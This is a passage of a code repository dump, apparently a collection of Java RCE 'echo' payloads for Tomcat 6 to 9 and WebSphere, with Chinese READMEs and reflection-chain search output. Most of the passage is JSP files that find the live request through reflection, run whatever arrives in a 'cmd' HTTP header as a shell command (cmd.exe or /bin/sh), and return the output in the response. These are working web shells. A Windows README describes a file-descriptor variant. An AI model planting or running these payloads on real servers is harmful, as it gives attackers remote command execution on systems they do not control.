36 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
37 | ---> global = {org.apache.coyote.RequestGroupInfo}
38 | ---> processors = {java.util.List}
39 | ---> [0] = {org.apache.coyote.RequestInfo}
40 |
41 |
42 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
43 | ---> group = {java.lang.ThreadGroup}
44 | ---> threads = {class [Ljava.lang.Thread;}
45 | ---> [16] = {java.lang.Thread}
46 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
47 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
48 | ---> connections = {java.util.Map>}
49 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
50 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
51 | ---> request = {org.apache.coyote.Request}
52 | ---> notes = {class [Ljava.lang.Object;}
53 | ---> [1] = {org.apache.catalina.connector.Request}
54 |
55 |
56 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
57 | ---> group = {java.lang.ThreadGroup}
58 | ---> threads = {class [Ljava.lang.Thread;}
59 | ---> [16] = {java.lang.Thread}
60 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
61 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
62 | ---> connections = {java.util.Map>}
63 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
64 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
65 | ---> request = {org.apache.coyote.Request}
66 | ---> notes = {class [Ljava.lang.Object;}
67 | ---> [1] = {org.apache.catalina.connector.Request}
68 | ---> applicationRequest = {org.apache.catalina.connector.RequestFacade}
69 |
70 |
71 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
72 | ---> group = {java.lang.ThreadGroup}
73 | ---> threads = {class [Ljava.lang.Thread;}
74 | ---> [16] = {java.lang.Thread}
75 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
76 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
77 | ---> connections = {java.util.Map>}
78 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
79 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
80 | ---> request = {org.apache.coyote.Request}
81 | ---> notes = {class [Ljava.lang.Object;}
82 | ---> [1] = {org.apache.catalina.connector.Request}
83 | ---> specialAttributes = {java.util.Map}
84 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
85 |
86 |
87 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
88 | ---> group = {java.lang.ThreadGroup}
89 | ---> threads = {class [Ljava.lang.Thread;}
90 | ---> [16] = {java.lang.Thread}
91 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
92 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
93 | ---> connections = {java.util.Map>}
94 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
95 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
96 | ---> request = {org.apache.coyote.Request}
97 | ---> notes = {class [Ljava.lang.Object;}
98 | ---> [1] = {org.apache.catalina.connector.Request}
99 | ---> specialAttributes = {java.util.Map}
100 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
101 |
102 |
103 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
104 | ---> group = {java.lang.ThreadGroup}
105 | ---> threads = {class [Ljava.lang.Thread;}
106 | ---> [16] = {java.lang.Thread}
107 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
108 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
109 | ---> connections = {java.util.Map>}
110 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
111 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
112 | ---> request = {org.apache.coyote.Request}
113 | ---> notes = {class [Ljava.lang.Object;}
114 | ---> [1] = {org.apache.catalina.connector.Request}
115 | ---> specialAttributes = {java.util.Map}
116 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
117 |
118 |
119 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
120 | ---> group = {java.lang.ThreadGroup}
121 | ---> threads = {class [Ljava.lang.Thread;}
122 | ---> [16] = {java.lang.Thread}
123 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
124 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
125 | ---> connections = {java.util.Map>}
126 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
127 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
128 | ---> request = {org.apache.coyote.Request}
129 | ---> notes = {class [Ljava.lang.Object;}
130 | ---> [1] = {org.apache.catalina.connector.Request}
131 | ---> specialAttributes = {java.util.Map}
132 | ---> [org.apache.tomcat.sendfile.support] = {org.apache.catalina.connector.Request$7}
133 |
134 |
135 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
136 | ---> group = {java.lang.ThreadGroup}
137 | ---> threads = {class [Ljava.lang.Thread;}
138 | ---> [16] = {java.lang.Thread}
139 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
140 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
141 | ---> connections = {java.util.Map>}
142 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
143 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
144 | ---> request = {org.apache.coyote.Request}
145 | ---> notes = {class [Ljava.lang.Object;}
146 | ---> [1] = {org.apache.catalina.connector.Request}
147 | ---> specialAttributes = {java.util.Map}
148 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
149 |
150 |
151 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
152 | ---> group = {java.lang.ThreadGroup}
153 | ---> threads = {class [Ljava.lang.Thread;}
154 | ---> [16] = {java.lang.Thread}
155 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
156 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
157 | ---> connections = {java.util.Map>}
158 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
159 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
160 | ---> request = {org.apache.coyote.Request}
161 | ---> notes = {class [Ljava.lang.Object;}
162 | ---> [1] = {org.apache.catalina.connector.Request}
163 | ---> specialAttributes = {java.util.Map}
164 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
165 |
166 |
167 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
168 | ---> group = {java.lang.ThreadGroup}
169 | ---> threads = {class [Ljava.lang.Thread;}
170 | ---> [16] = {java.lang.Thread}
171 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
172 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
173 | ---> connections = {java.util.Map>}
174 | ---> [java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:14559]] = {org.apache.tomcat.util.net.NioEndpoint$NioSocketWrapper}
175 | ---> currentProcessor = {org.apache.coyote.http11.Http11Processor}
176 | ---> request = {org.apache.coyote.Request}
177 | ---> notes = {class [Ljava.lang.Object;}
178 | ---> [1] = {org.apache.catalina.connector.Request}
179 | ---> specialAttributes = {java.util.Map}
180 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
181 |
182 |
183 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
184 | ---> contextClassLoader = {org.apache.catalina.loader.ParallelWebappClassLoader}
185 | ---> resources = {org.apache.catalina.webresources.StandardRoot}
186 | ---> mserver = {com.sun.jmx.mbeanserver.JmxMBeanServer}
187 | ---> mbsInterceptor = {com.sun.jmx.interceptor.DefaultMBeanServerInterceptor}
188 | ---> repository = {com.sun.jmx.mbeanserver.Repository}
189 | ---> domainTb = {java.util.Map>}
190 | ---> [Catalina] = {java.util.HashMap}
191 | ---> [Catalina] = {com.sun.jmx.mbeanserver.NamedObject}
192 | ---> object = {org.apache.tomcat.util.modeler.BaseModelMBean}
193 | ---> resource = {org.apache.catalina.valves.AccessLogValve}
194 | ---> logElements = {class [Lorg.apache.catalina.valves.AbstractAccessLogValve$AccessLogElement;}
195 | ---> [9] = {org.apache.catalina.valves.AbstractAccessLogValve$RequestElement}
196 |
197 |
198 |
--------------------------------------------------------------------------------
/Tomcat/README.md:
--------------------------------------------------------------------------------
1 | # Tomcat 回显
2 |
3 | # 2020.9.19 update
4 | 参考 xary 中的 tomcat 回显代码对代码逻辑进行优化,并参考 xray 的 tomcat 回显代码将 Tomcat6/7/8/8.5/9 回显代码合并为一个文件
5 |
6 | ## 使用 ```c0ny1``` 编写的 ```Java Object Searcher``` 挖掘结果
7 | * Tomcat 6
8 | 
9 |
10 | * Tomcat 7
11 | 
12 |
13 | * Tomcat 8
14 | 
15 |
16 | * Tomcat 8.5
17 | 
18 |
19 | * Tomcat 9
20 | 
21 |
22 | ## 效果
23 | 
24 |
25 | ## 参考
26 | * [https://github.com/c0ny1/java-object-searcher/](https://github.com/c0ny1/java-object-searcher/)
27 | * [半自动化挖掘request实现多种中间件回显](http://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/)
28 |
--------------------------------------------------------------------------------
/Tomcat/code/Tomcat6Echo-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Object obj = Thread.currentThread();
4 | java.lang.reflect.Field field = obj.getClass().getDeclaredField("target");
5 | field.setAccessible(true);
6 | obj = field.get(obj);
7 |
8 | field = obj.getClass().getDeclaredField("this$0");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | field = obj.getClass().getDeclaredField("handler");
13 | field.setAccessible(true);
14 | obj = field.get(obj);
15 |
16 | field = obj.getClass().getDeclaredField("global");
17 | field.setAccessible(true);
18 | obj = field.get(obj);
19 |
20 | field = obj.getClass().getDeclaredField("processors");
21 | field.setAccessible(true);
22 | obj = field.get(obj);
23 |
24 |
25 | java.util.List processors = (java.util.List) obj;
26 | for (Object o : processors) {
27 | field = o.getClass().getDeclaredField("req");
28 | field.setAccessible(true);
29 | obj = field.get(o);
30 | org.apache.coyote.Request req = (org.apache.coyote.Request) obj;
31 |
32 | String cmd = req.getHeader("cmd");
33 | if (cmd != null) {
34 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
35 | org.apache.tomcat.util.buf.ByteChunk bc = new org.apache.tomcat.util.buf.ByteChunk();
36 | bc.setBytes(res.getBytes(), 0, res.getBytes().length);
37 | req.getResponse().doWrite(bc);
38 | }
39 | }
40 | %>
--------------------------------------------------------------------------------
/Tomcat/code/Tomcat78Echo-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Object obj = Thread.currentThread();
4 | java.lang.reflect.Field field = obj.getClass().getSuperclass().getDeclaredField("group");
5 | field.setAccessible(true);
6 | obj = field.get(obj);
7 |
8 | field = obj.getClass().getDeclaredField("threads");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Thread[] threads = (Thread[])obj;
13 | label:for(Thread thread : threads){
14 | try{
15 | if((thread.getName().contains("http-apr") && thread.getName().contains("Poller"))
16 | || (thread.getName().contains("http-bio") && thread.getName().contains("AsyncTimeout"))
17 | || (thread.getName().contains("http-nio") && thread.getName().contains("Poller"))) {
18 | field = thread.getClass().getDeclaredField("target");
19 | field.setAccessible(true);
20 | obj = field.get(thread);
21 |
22 | field = obj.getClass().getDeclaredField("this$0");
23 | field.setAccessible(true);
24 | obj = field.get(obj);
25 |
26 | try{
27 | field = obj.getClass().getDeclaredField("handler");
28 | }catch (NoSuchFieldException e){
29 | field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
30 | }
31 | field.setAccessible(true);
32 | obj = field.get(obj);
33 |
34 | try{
35 | field = obj.getClass().getSuperclass().getDeclaredField("global");
36 | }catch(NoSuchFieldException e){
37 | field = obj.getClass().getDeclaredField("global");
38 | }
39 | field.setAccessible(true);
40 | obj = field.get(obj);
41 |
42 | field = obj.getClass().getDeclaredField("processors");
43 | field.setAccessible(true);
44 | obj = field.get(obj);
45 |
46 |
47 | java.util.List processors = (java.util.List) obj;
48 | for (Object o : processors) {
49 | field = o.getClass().getDeclaredField("req");
50 | field.setAccessible(true);
51 | obj = field.get(o);
52 | org.apache.coyote.Request req = (org.apache.coyote.Request) obj;
53 |
54 | String cmd = req.getHeader("cmd");
55 | if (cmd != null) {
56 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
57 |
58 | org.apache.tomcat.util.buf.ByteChunk bc = new org.apache.tomcat.util.buf.ByteChunk();
59 | bc.setBytes(res.getBytes(), 0, res.getBytes().length);
60 | req.getResponse().doWrite(bc);
61 | break label;
62 | }
63 | }
64 | }
65 | }catch(Exception e){
66 | e.printStackTrace();
67 | }
68 | }
69 | %>
--------------------------------------------------------------------------------
/Tomcat/code/Tomcat9Echo-deprecated.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Object obj = Thread.currentThread();
4 | java.lang.reflect.Field field = obj.getClass().getSuperclass().getDeclaredField("group");
5 | field.setAccessible(true);
6 | obj = field.get(obj);
7 |
8 | field = obj.getClass().getDeclaredField("threads");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Thread[] threads = (Thread[])obj;
13 | label:for(Thread thread : threads){
14 | try{
15 | if(thread.getName().contains("http-nio") && thread.getName().contains("ClientPoller")) {
16 | field = thread.getClass().getDeclaredField("target");
17 | field.setAccessible(true);
18 | obj = field.get(thread);
19 |
20 | field = obj.getClass().getDeclaredField("this$0");
21 | field.setAccessible(true);
22 | obj = field.get(obj);
23 |
24 | field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
25 | field.setAccessible(true);
26 | obj = field.get(obj);
27 |
28 | field = obj.getClass().getDeclaredField("global");
29 | field.setAccessible(true);
30 | obj = field.get(obj);
31 |
32 | field = obj.getClass().getDeclaredField("processors");
33 | field.setAccessible(true);
34 | obj = field.get(obj);
35 |
36 |
37 | java.util.List processors = (java.util.List) obj;
38 | for (Object o : processors) {
39 | field = o.getClass().getDeclaredField("req");
40 | field.setAccessible(true);
41 | obj = field.get(o);
42 | org.apache.coyote.Request req = (org.apache.coyote.Request) obj;
43 |
44 | String cmd = req.getHeader("cmd");
45 | if (cmd != null) {
46 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
47 | java.nio.ByteBuffer buffer = java.nio.ByteBuffer.wrap(res.getBytes());
48 | req.getResponse().doWrite(buffer);
49 | break label;
50 | }
51 | }
52 | }
53 | }catch(Exception e){
54 | e.printStackTrace();
55 | }
56 | }
57 | %>
--------------------------------------------------------------------------------
/Tomcat/code/TomcatEcho-全版本.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="org.apache.tomcat.util.buf.ByteChunk" %>
2 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
3 | <%
4 | boolean flag = false;
5 | ThreadGroup group = Thread.currentThread().getThreadGroup();
6 | java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
7 | f.setAccessible(true);
8 | Thread[] threads = (Thread[]) f.get(group);
9 |
10 | for(int i = 0; i < threads.length; i++) {
11 | try{
12 | Thread t = threads[i];
13 | if (t == null) continue;
14 |
15 | String str = t.getName();
16 | if (str.contains("exec") || !str.contains("http")) continue;
17 |
18 |
19 | f = t.getClass().getDeclaredField("target");
20 | f.setAccessible(true);
21 | Object obj = f.get(t);
22 |
23 | if (!(obj instanceof Runnable)) continue;
24 |
25 | f = obj.getClass().getDeclaredField("this$0");
26 | f.setAccessible(true);
27 | obj = f.get(obj);
28 |
29 | try{
30 | f = obj.getClass().getDeclaredField("handler");
31 | }catch (NoSuchFieldException e){
32 | f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
33 | }
34 | f.setAccessible(true);
35 | obj = f.get(obj);
36 |
37 | try{
38 | f = obj.getClass().getSuperclass().getDeclaredField("global");
39 | }catch(NoSuchFieldException e){
40 | f = obj.getClass().getDeclaredField("global");
41 | }
42 | f.setAccessible(true);
43 | obj = f.get(obj);
44 |
45 | f = obj.getClass().getDeclaredField("processors");
46 | f.setAccessible(true);
47 | java.util.List processors = (java.util.List)(f.get(obj));
48 |
49 | for(int j = 0; j < processors.size(); ++j) {
50 | Object processor = processors.get(j);
51 | f = processor.getClass().getDeclaredField("req");
52 | f.setAccessible(true);
53 | Object req = f.get(processor);
54 | Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
55 |
56 | str = (String)req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
57 |
58 | if (str != null && !str.isEmpty()) {
59 | resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
60 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
61 | byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
62 |
63 | try {
64 | Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
65 | obj = cls.newInstance();
66 | cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
67 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
68 | } catch (NoSuchMethodException var5) {
69 | Class cls = Class.forName("java.nio.ByteBuffer");
70 | obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
71 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
72 | }
73 |
74 | flag = true;
75 | }
76 |
77 | if (flag) break;
78 | }
79 |
80 | if (flag) break;
81 | }catch(Exception e){
82 | continue;
83 | }
84 | }
85 | %>
--------------------------------------------------------------------------------
/Tomcat/code/TomcatEchoTypeB-全版本.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 |
4 | // 参考:
5 | // 《tomcat不出网回显连续剧第六集》 https://xz.aliyun.com/t/7535
6 |
7 | boolean flag = false;
8 |
9 | javax.management.MBeanServer mbeanServer = org.apache.tomcat.util.modeler.Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
10 | java.lang.reflect.Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
11 | field.setAccessible(true);
12 | Object obj = field.get(mbeanServer);
13 |
14 | field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
15 | field.setAccessible(true);
16 | com.sun.jmx.mbeanserver.Repository repository = (com.sun.jmx.mbeanserver.Repository) field.get(obj);
17 |
18 | java.util.Set objectSet = repository.query(new javax.management.ObjectName("Catalina:type=GlobalRequestProcessor,*"), null);
19 | for(com.sun.jmx.mbeanserver.NamedObject namedObject : objectSet){
20 | javax.management.DynamicMBean dynamicMBean = namedObject.getObject();
21 | field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
22 | field.setAccessible(true);
23 | obj = field.get(dynamicMBean);
24 |
25 | field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
26 | field.setAccessible(true);
27 | java.util.ArrayList procssors = (java.util.ArrayList) field.get(obj);
28 |
29 | field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
30 | field.setAccessible(true);
31 | for(int i = 0; i < procssors.size(); i++){
32 | org.apache.coyote.Request req = (org.apache.coyote.Request) field.get(procssors.get(i));
33 | String cmd = req.getHeader("cmd");
34 | if(cmd != null && !cmd.isEmpty()){
35 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
36 | byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
37 |
38 | Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
39 | try {
40 | Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
41 | obj = cls.newInstance();
42 | cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
43 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
44 | } catch (NoSuchMethodException var5) {
45 | Class cls = Class.forName("java.nio.ByteBuffer");
46 | obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
47 | resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
48 | }
49 |
50 | flag = true;
51 | }
52 |
53 | if(flag) break;
54 | }
55 | }
56 | %>
57 |
--------------------------------------------------------------------------------
/Tomcat/code/根据网上流传的xary payload提取的tomcat回显字节码文件.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/code/根据网上流传的xary payload提取的tomcat回显字节码文件.class
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat6 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat6 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat6.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat7 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat7 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat7.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8.5 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8.5 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8.5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8.5.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat8.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat9 Search Result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat9 Search Result.png
--------------------------------------------------------------------------------
/Tomcat/imgs/Tomcat9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Tomcat/imgs/Tomcat9.png
--------------------------------------------------------------------------------
/Websphere/README.md:
--------------------------------------------------------------------------------
1 | # Websphere 回显
2 |
3 | ## 效果
4 | 
5 |
6 |
--------------------------------------------------------------------------------
/Websphere/code/websphereEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
8 | Object[] obj_arr = (Object[]) obj;
9 | for(int i = 0; i < obj_arr.length; i++){
10 | Object o = obj_arr[i];
11 | if(o == null) continue;
12 |
13 | if(o.getClass().getName().endsWith("WebContainerRequestState")){
14 | Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]);
15 | Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]);
16 |
17 | String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
18 | if(cmd != null && !cmd.isEmpty()){
19 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
20 |
21 | java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]);
22 | printWriter.println(res);
23 | }
24 |
25 | break;
26 | }
27 | }
28 | %>
29 |
--------------------------------------------------------------------------------
/Websphere/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Websphere/img/001.png
--------------------------------------------------------------------------------
/Windows/README.md:
--------------------------------------------------------------------------------
1 | # Windows 通用回显
2 |
3 | ## 说明
4 | 看了 ```lufei``` 师傅的文章 ```《win描述符下成功又失败的回显》```,才知道原来在 ```Windows NIO/BIO``` 中也有类似 ```Linux``` 中 ```FileDescriptor``` 的存在,虽然通过查看 ```JNI``` 的源码知道是一个句柄文件,但是用 ```Java```
5 | 代码处理起来都是类似的。
6 |
7 | ```Windows NIO/BIO``` 是通过 ```JNI``` 调用 ```winsock2.h``` 的 ```SOCKET WSAAPI accept(SOCKET s,sockaddr *addr,int *addrlen);``` 函数获取 ```socket```,
8 | 随后将其转换成 ```jint``` 返回给 ```Java``` 程序,存储为 ```FileDescriptor```。在向 ```socket``` 返回数据时, ```Java``` 代码再把 ```FileDescriptor``` 通过 ```JNI``` 转换为 ```SOCKET``` 传递给 ```
9 | int WSAAPI WSASend(SOCKET s,LPWSABUF lpBuffers,DWORD dwBufferCount,LPDWORD lpNumberOfBytesSent,DWORD dwFlags,LPWSAOVERLAPPED lpOverlapped,LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);```
10 | 函数,从而完成数据的发送。
11 |
12 | 开始的时候,想着可以通过遍历 ```fd``` 的值,利用反射创建对应的 FileDescriptor,然后通过 ```JNI``` 转换成 ```SOCKET``` 并传递给 ```getpeername``` 函数尝试去获取对端地址,如果能拿到结果,说明 ```fd``` 的值是有效的,
13 | 对应着一个有效的 ```socket```。
14 | 然而实践之后并没有拿到想要的结果。由于对 ```c``` 近乎一窍不通,于是只能放弃这种方式,转而从 ```Java``` 代码中尝试去寻找是否有接受 ```FileDescriptor``` 作为参数并返回一些信息的静态方法。结果果然找到了
15 | ```sun.nio.ch.Net#remoteAddress``` , 这个方法返回的结果就是我最开始时想通过 ```JNI``` 方式拿到的结果。
16 |
17 | 于是,一切就很简单了,遍历 ```fd``` 的值,利用反射创建对应的 ```FileDescriptor```,然后调用 ```sun.nio.ch.Net#remoteAddress``` 确认 ```FileDescriptor``` 的有效性,如果有效,往里面写数据,
18 | 从而实现回显。
19 |
20 | ## 效果
21 | 在 ```Tomcat 9.0.33```,```Jetty 9.4.30.v20200611```,```Resin/4.0.64``` 中测试通过
22 | 
23 | 
24 | 
25 |
26 | ## 参考
27 | * [win描述符下成功又失败的回显](https://xz.aliyun.com/t/7566)
28 | * [Socket 和 SocketChannel 的 FileDescriptor](https://blog.csdn.net/zxcc1314/article/details/99986252)
29 | * [https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/ServerSocketChannelImpl.c](https://github.com/JetBrains/jdk8u_jdk/blob/master/src/windows/native/sun/nio/ch/ServerSocketChannelImpl.c)
